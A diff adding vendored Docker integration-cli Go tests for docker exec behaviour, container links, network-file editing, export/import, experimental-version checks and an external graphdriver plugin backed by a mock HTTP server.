+	}
+
+	// Save execID for later
+	execID, err := inspectFilter(id, "index .ExecIDs 0")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to get the exec id"))
+
+	// End the exec by creating the missing file
+	err = exec.Command(dockerBinary, "exec", id,
+		"sh", "-c", "touch /execid1").Run()
+
+	c.Assert(err, checker.IsNil, check.Commentf("failed to run the 2nd exec cmd"))
+
+	// Wait for 1st exec to complete
+	cmd.Wait()
+
+	// Give the exec 10 chances/seconds to stop then give up and stop the test
+	for i := 0; i < tries; i++ {
+		// Since its still running we should see exec as part of the container
+		out = strings.TrimSpace(inspectField(c, id, "ExecIDs"))
+
+		if out == "[]" {
+			break
+		}
+		c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still not empty after 10 second"))
+		time.Sleep(1 * time.Second)
+	}
+
+	// But we should still be able to query the execID
+	sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil)
+	c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body))
+
+	// Now delete the container and then an 'inspect' on the exec should
+	// result in a 404 (not 'container not running')
+	out, ec := dockerCmd(c, "rm", "-f", id)
+	c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out))
+	sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil)
+	c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body))
+}
+
+func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) {
+	// Problematic on Windows as Windows does not support links
+	testRequires(c, DaemonIsLinux)
+	var out string
+	out, _ = dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
+	idA := strings.TrimSpace(out)
+	c.Assert(idA, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out))
+	out, _ = dockerCmd(c, "run", "-d", "--link", "container1:alias1", "--name", "container2", "busybox", "top")
+	idB := strings.TrimSpace(out)
+	c.Assert(idB, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out))
+
+	dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
+	dockerCmd(c, "rename", "container1", "container_new")
+	dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
+}
+
+func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) {
+	// Not applicable on Windows to Windows CI.
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	for _, fn := range []string{"resolv.conf", "hosts"} {
+		deleteAllContainers()
+
+		content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)))
+		c.Assert(err, checker.IsNil)
+
+		c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content)))
+
+		out, _ := dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top")
+		contID := strings.TrimSpace(out)
+		netFilePath := containerStorageFile(contID, fn)
+
+		f, err := os.OpenFile(netFilePath, os.O_WRONLY|os.O_SYNC|os.O_APPEND, 0644)
+		c.Assert(err, checker.IsNil)
+
+		if _, err := f.Seek(0, 0); err != nil {
+			f.Close()
+			c.Fatal(err)
+		}
+
+		if err := f.Truncate(0); err != nil {
+			f.Close()
+			c.Fatal(err)
+		}
+
+		if _, err := f.Write([]byte("success2\n")); err != nil {
+			f.Close()
+			c.Fatal(err)
+		}
+		f.Close()
+
+		res, _ := dockerCmd(c, "exec", contID, "cat", "/etc/"+fn)
+		c.Assert(res, checker.Equals, "success2\n")
+	}
+}
+
+func (s *DockerSuite) TestExecWithUser(c *check.C) {
+	// TODO Windows CI: This may be fixable in the future once Windows
+	// supports users
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top")
+
+	out, _ := dockerCmd(c, "exec", "-u", "1", "parent", "id")
+	c.Assert(out, checker.Contains, "uid=1(daemon) gid=1(daemon)")
+
+	out, _ = dockerCmd(c, "exec", "-u", "root", "parent", "id")
+	c.Assert(out, checker.Contains, "uid=0(root) gid=0(root)", check.Commentf("exec with user by id expected daemon user got %s", out))
+}
+
+func (s *DockerSuite) TestExecWithPrivileged(c *check.C) {
+	// Not applicable on Windows
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	// Start main loop which attempts mknod repeatedly
+	dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`)
+
+	// Check exec mknod doesn't work
+	cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16")
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail"))
+	c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail"))
+
+	// Check exec mknod does work with --privileged
+	cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`)
+	out, _, err = runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil)
+
+	actual := strings.TrimSpace(out)
+	c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out))
+
+	// Check subsequent unprivileged exec cannot mknod
+	cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32")
+	out, _, err = runCommandWithOutput(cmd)
+	c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail"))
+	c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail"))
+
+	// Confirm at no point was mknod allowed
+	logCmd := exec.Command(dockerBinary, "logs", "parent")
+	out, _, err = runCommandWithOutput(logCmd)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), "Success")
+
+}
+
+func (s *DockerSuite) TestExecWithImageUser(c *check.C) {
+	// Not applicable on Windows
+	testRequires(c, DaemonIsLinux)
+	name := "testbuilduser"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+		USER dockerio`,
+		true)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top")
+
+	out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami")
+	c.Assert(out, checker.Contains, "dockerio", check.Commentf("exec with user by id expected dockerio user got %s", out))
+}
+
+func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) {
+	// Windows does not support read-only
+	// --read-only + userns has remount issues
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "run", "-d", "--read-only", "--name", "parent", "busybox", "top")
+	dockerCmd(c, "exec", "parent", "true")
+}
+
+func (s *DockerSuite) TestExecUlimits(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testexeculimits"
+	runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name)
+	c.Assert(waitRun(name), checker.IsNil)
+
+	out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "21")
+}
+
+// #15750
+func (s *DockerSuite) TestExecStartFails(c *check.C) {
+	// TODO Windows CI. This test should be portable. Figure out why it fails
+	// currently.
+	testRequires(c, DaemonIsLinux)
+	name := "exec-15750"
+	runSleepingContainer(c, "-d", "--name", name)
+	c.Assert(waitRun(name), checker.IsNil)
+
+	out, _, err := dockerCmdWithError("exec", name, "no-such-cmd")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "executable file not found")
+}
+
+// Fix regression in https://github.com/docker/docker/pull/26461#issuecomment-250287297
+func (s *DockerSuite) TestExecWindowsPathNotWiped(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	out, _ := dockerCmd(c, "run", "-d", "--name", "testing", minimalBaseImage(), "powershell", "start-sleep", "60")
+	c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil)
+
+	out, _ = dockerCmd(c, "exec", "testing", "powershell", "write-host", "$env:PATH")
+	out = strings.ToLower(strings.Trim(out, "\r\n"))
+	c.Assert(out, checker.Contains, `windowspowershell\v1.0`)
+}
+
+func (s *DockerSuite) TestExecEnvLinksHost(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	runSleepingContainer(c, "-d", "--name", "foo")
+	runSleepingContainer(c, "-d", "--link", "foo:db", "--hostname", "myhost", "--name", "bar")
+	out, _ := dockerCmd(c, "exec", "bar", "env")
+	c.Assert(out, checker.Contains, "HOSTNAME=myhost")
+	c.Assert(out, checker.Contains, "DB_NAME=/bar/db")
+}
+
+func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	runSleepingContainer(c, "-d", "--name", "test")
+	exec := make(chan bool)
+	go func() {
+		dockerCmd(c, "exec", "test", "cmd", "/c", "start sleep 10")
+		exec <- true
+	}()
+
+	for {
+		top := make(chan string)
+		var out string
+		go func() {
+			out, _ := dockerCmd(c, "top", "test")
+			top <- out
+		}()
+
+		select {
+		case <-time.After(time.Second * 5):
+			c.Error("timed out waiting for top while exec is exiting")
+		case out = <-top:
+			break
+		}
+
+		if strings.Count(out, "busybox.exe") == 2 && !strings.Contains(out, "cmd.exe") {
+			// The initial exec process (cmd.exe) has exited, and both sleeps are currently running
+			break
+		}
+		time.Sleep(1 * time.Second)
+	}
+
+	inspect := make(chan bool)
+	go func() {
+		dockerCmd(c, "inspect", "test")
+		inspect <- true
+	}()
+
+	select {
+	case <-time.After(time.Second * 5):
+		c.Error("timed out waiting for inspect while exec is exiting")
+	case <-inspect:
+		break
+	}
+
+	// Ensure the background sleep is still running
+	out, _ := dockerCmd(c, "top", "test")
+	c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 2)
+
+	// The exec should exit when the background sleep exits
+	select {
+	case <-time.After(time.Second * 15):
+		c.Error("timed out waiting for async exec to exit")
+	case <-exec:
+		// Ensure the background sleep has actually exited
+		out, _ := dockerCmd(c, "top", "test")
+		c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 1)
+		break
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
new file mode 100644
index 0000000000..5f691196f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
@@ -0,0 +1,93 @@
+// +build !windows,!test_no_exec
+
+package main
+
+import (
+	"bytes"
+	"io"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// regression test for #12546
+func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat")
+	contID := strings.TrimSpace(out)
+
+	cmd := exec.Command(dockerBinary, "exec", "-i", contID, "echo", "-n", "hello")
+	p, err := pty.Start(cmd)
+	c.Assert(err, checker.IsNil)
+
+	b := bytes.NewBuffer(nil)
+	go io.Copy(b, p)
+
+	ch := make(chan error)
+	go func() { ch <- cmd.Wait() }()
+
+	select {
+	case err := <-ch:
+		c.Assert(err, checker.IsNil)
+		output := b.String()
+		c.Assert(strings.TrimSpace(output), checker.Equals, "hello")
+	case <-time.After(5 * time.Second):
+		c.Fatal("timed out running docker exec")
+	}
+}
+
+func (s *DockerSuite) TestExecTTY(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	dockerCmd(c, "run", "-d", "--name=test", "busybox", "sh", "-c", "echo hello > /foo && top")
+
+	cmd := exec.Command(dockerBinary, "exec", "-it", "test", "sh")
+	p, err := pty.Start(cmd)
+	c.Assert(err, checker.IsNil)
+	defer p.Close()
+
+	_, err = p.Write([]byte("cat /foo && exit\n"))
+	c.Assert(err, checker.IsNil)
+
+	chErr := make(chan error)
+	go func() {
+		chErr <- cmd.Wait()
+	}()
+	select {
+	case err := <-chErr:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(3 * time.Second):
+		c.Fatal("timeout waiting for exec to exit")
+	}
+
+	buf := make([]byte, 256)
+	read, err := p.Read(buf)
+	c.Assert(err, checker.IsNil)
+	c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read])))
+}
+
+// Test the the TERM env var is set when -t is provided on exec
+func (s *DockerSuite) TestExecWithTERM(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat")
+	contID := strings.TrimSpace(out)
+	cmd := exec.Command(dockerBinary, "exec", "-t", contID, "sh", "-c", "if [ -z $TERM ]; then exit 1; else exit 0; fi")
+	if err := cmd.Run(); err != nil {
+		c.Assert(err, checker.IsNil)
+	}
+}
+
+// Test that the TERM env var is not set on exec when -t is not provided, even if it was set
+// on run
+func (s *DockerSuite) TestExecWithNoTERM(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat")
+	contID := strings.TrimSpace(out)
+	cmd := exec.Command(dockerBinary, "exec", contID, "sh", "-c", "if [ -z $TERM ]; then exit 0; else exit 1; fi")
+	if err := cmd.Run(); err != nil {
+		c.Assert(err, checker.IsNil)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
new file mode 100644
index 0000000000..6a49cc8cb1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
@@ -0,0 +1,36 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+
+	out, _ := dockerCmd(c, "version")
+	for _, line := range strings.Split(out, "\n") {
+		if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") {
+			c.Assert(line, checker.Matches, "*true")
+			return
+		}
+	}
+
+	c.Fatal(`"Experimental" not found in version output`)
+}
+
+func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) {
+	testRequires(c, NotExperimentalDaemon)
+
+	out, _ := dockerCmd(c, "version")
+	for _, line := range strings.Split(out, "\n") {
+		if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") {
+			c.Assert(line, checker.Matches, "*false")
+			return
+		}
+	}
+
+	c.Fatal(`"Experimental" not found in version output`)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
new file mode 100644
index 0000000000..069dc08162
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
@@ -0,0 +1,49 @@
+package main
+
+import (
+	"os"
+	"os/exec"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// export an image and try to import it into a new one
+func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := "testexportcontainerandimportimage"
+
+	dockerCmd(c, "run", "--name", containerID, "busybox", "true")
+
+	out, _ := dockerCmd(c, "export", containerID)
+
+	importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1")
+	importCmd.Stdin = strings.NewReader(out)
+	out, _, err := runCommandWithOutput(importCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out))
+
+	cleanedImageID := strings.TrimSpace(out)
+	c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id"))
+}
+
+// Used to test output flag in the export command
+func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := "testexportcontainerwithoutputandimportimage"
+
+	dockerCmd(c, "run", "--name", containerID, "busybox", "true")
+	dockerCmd(c, "export", "--output=testexp.tar", containerID)
+	defer os.Remove("testexp.tar")
+
+	out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar"))
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1")
+	importCmd.Stdin = strings.NewReader(out)
+	out, _, err = runCommandWithOutput(importCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out))
+
+	cleanedImageID := strings.TrimSpace(out)
+	c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go
new file mode 100644
index 0000000000..a794ca742d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go
@@ -0,0 +1,405 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/vfs"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/go-check/check"
+)
+
+func init() {
+	check.Suite(&DockerExternalGraphdriverSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerExternalGraphdriverSuite struct {
+	server  *httptest.Server
+	jserver *httptest.Server
+	ds      *DockerSuite
+	d       *Daemon
+	ec      map[string]*graphEventsCounter
+}
+
+type graphEventsCounter struct {
+	activations int
+	creations   int
+	removals    int
+	gets        int
+	puts        int
+	stats       int
+	cleanups    int
+	exists      int
+	init        int
+	metadata    int
+	diff        int
+	applydiff   int
+	changes     int
+	diffsize    int
+}
+
+func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) {
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) {
+	s.d.Stop()
+	s.ds.TearDownTest(c)
+}
+
+func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) {
+	s.ec = make(map[string]*graphEventsCounter)
+	s.setUpPluginViaSpecFile(c)
+	s.setUpPluginViaJSONFile(c)
+}
+
+func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) {
+	mux := http.NewServeMux()
+	s.server = httptest.NewServer(mux)
+
+	s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL))
+}
+
+func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) {
+	mux := http.NewServeMux()
+	s.jserver = httptest.NewServer(mux)
+
+	p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL)
+	b, err := json.Marshal(p)
+	c.Assert(err, check.IsNil)
+
+	s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b)
+}
+
+func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) {
+	type graphDriverRequest struct {
+		ID         string `json:",omitempty"`
+		Parent     string `json:",omitempty"`
+		MountLabel string `json:",omitempty"`
+		ReadOnly   bool   `json:",omitempty"`
+	}
+
+	type graphDriverResponse struct {
+		Err      error             `json:",omitempty"`
+		Dir      string            `json:",omitempty"`
+		Exists   bool              `json:",omitempty"`
+		Status   [][2]string       `json:",omitempty"`
+		Metadata map[string]string `json:",omitempty"`
+		Changes  []archive.Change  `json:",omitempty"`
+		Size     int64             `json:",omitempty"`
+	}
+
+	respond := func(w http.ResponseWriter, data interface{}) {
+		w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json")
+		switch t := data.(type) {
+		case error:
+			fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error()))
+		case string:
+			fmt.Fprintln(w, t)
+		default:
+			json.NewEncoder(w).Encode(&data)
+		}
+	}
+
+	decReq := func(b io.ReadCloser, out interface{}, w http.ResponseWriter) error {
+		defer b.Close()
+		if err := json.NewDecoder(b).Decode(&out); err != nil {
+			http.Error(w, fmt.Sprintf("error decoding json: %s", err.Error()), 500)
+		}
+		return nil
+	}
+
+	base, err := ioutil.TempDir("", name)
+	c.Assert(err, check.IsNil)
+	vfsProto, err := vfs.Init(base, []string{}, nil, nil)
+	c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver"))
+	driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil)
+
+	s.ec[ext] = &graphEventsCounter{}
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].activations++
+		respond(w, `{"Implements": ["GraphDriver"]}`)
+	})
+
+	mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].init++
+		respond(w, "{}")
+	})
+
+	mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].creations++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+		if err := driver.CreateReadWrite(req.ID, req.Parent, nil); err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, "{}")
+	})
+
+	mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].creations++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+		if err := driver.Create(req.ID, req.Parent, nil); err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, "{}")
+	})
+
+	mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].removals++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		if err := driver.Remove(req.ID); err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, "{}")
+	})
+
+	mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].gets++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		dir, err := driver.Get(req.ID, req.MountLabel)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, &graphDriverResponse{Dir: dir})
+	})
+
+	mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].puts++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		if err := driver.Put(req.ID); err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, "{}")
+	})
+
+	mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].exists++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+		respond(w, &graphDriverResponse{Exists: driver.Exists(req.ID)})
+	})
+
+	mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].stats++
+		respond(w, &graphDriverResponse{Status: driver.Status()})
+	})
+
+	mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].cleanups++
+		err := driver.Cleanup()
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, `{}`)
+	})
+
+	mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].metadata++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		data, err := driver.GetMetadata(req.ID)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, &graphDriverResponse{Metadata: data})
+	})
+
+	mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].diff++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		diff, err := driver.Diff(req.ID, req.Parent)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		io.Copy(w, diff)
+	})
+
+	mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].changes++
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		changes, err := driver.Changes(req.ID, req.Parent)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, &graphDriverResponse{Changes: changes})
+	})
+
+	mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].applydiff++
+		diff := r.Body
+		defer r.Body.Close()
+
+		id := r.URL.Query().Get("id")
+		parent := r.URL.Query().Get("parent")
+
+		if id == "" {
+			http.Error(w, fmt.Sprintf("missing id"), 409)
+		}
+
+		size, err := driver.ApplyDiff(id, parent, diff)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, &graphDriverResponse{Size: size})
+	})
+
+	mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) {
+		s.ec[ext].diffsize++
+
+		var req graphDriverRequest
+		if err := decReq(r.Body, &req, w); err != nil {
+			return
+		}
+
+		size, err := driver.DiffSize(req.ID, req.Parent)
+		if err != nil {
+			respond(w, err)
+			return
+		}
+		respond(w, &graphDriverResponse{Size: size})
+	})
+
+	err = os.MkdirAll("/etc/docker/plugins", 0755)
+	c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins"))
+
+	specFile := "/etc/docker/plugins/" + name + "." + ext
+	err = ioutil.WriteFile(specFile, b, 0644)
+	c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile))
+}
+
+func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) {
+	s.server.Close()
+	s.jserver.Close()
+
+	err := os.RemoveAll("/etc/docker/plugins")
+	c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins"))
+}
+
+func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+
+	s.testExternalGraphDriver("test-external-graph-driver", "spec", c)
+	s.testExternalGraphDriver("json-external-graph-driver", "json", c)
+}
+
+func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) {
+	if err := s.d.StartWithBusybox("-s", name); err != nil {
+		b, _ := ioutil.ReadFile(s.d.LogFileName())
+		c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b)))
+	}
+
+	out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	err = s.d.Restart("-s", name)
+
+	out, err = s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), check.Equals, name)
+
+	out, err = s.d.Cmd("diff", "graphtest")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out))
+
+	out, err = s.d.Cmd("rm", "-f", "graphtest")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("info")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	err = s.d.Stop()
+	c.Assert(err, check.IsNil)
+
+	// Don't check s.ec.exists, because the daemon no longer calls the
+	// Exists function.
+	c.Assert(s.ec[ext].activations, check.Equals, 2)
+	c.Assert(s.ec[ext].init, check.Equals, 2)
+	c.Assert(s.ec[ext].creations >= 1, check.Equals, true)
+	c.Assert(s.ec[ext].removals >= 1, check.Equals, true)
+	c.Assert(s.ec[ext].gets >= 1, check.Equals, true)
+	c.Assert(s.ec[ext].puts >= 1, check.Equals, true)
+	c.Assert(s.ec[ext].stats, check.Equals, 5)
+	c.Assert(s.ec[ext].cleanups, check.Equals, 2)
+	c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true)
+	c.Assert(s.ec[ext].changes, check.Equals, 1)
+	c.Assert(s.ec[ext].diffsize, check.Equals, 0)
+	c.Assert(s.ec[ext].diff, check.Equals, 0)
+	c.Assert(s.ec[ext].metadata, check.Equals, 1)
+}
+
+func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) {
+	testRequires(c, Network, ExperimentalDaemon)
+
+	c.Assert(s.d.Start(), check.IsNil)
+
+	out, err := s.d.Cmd("pull", "busybox:latest")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
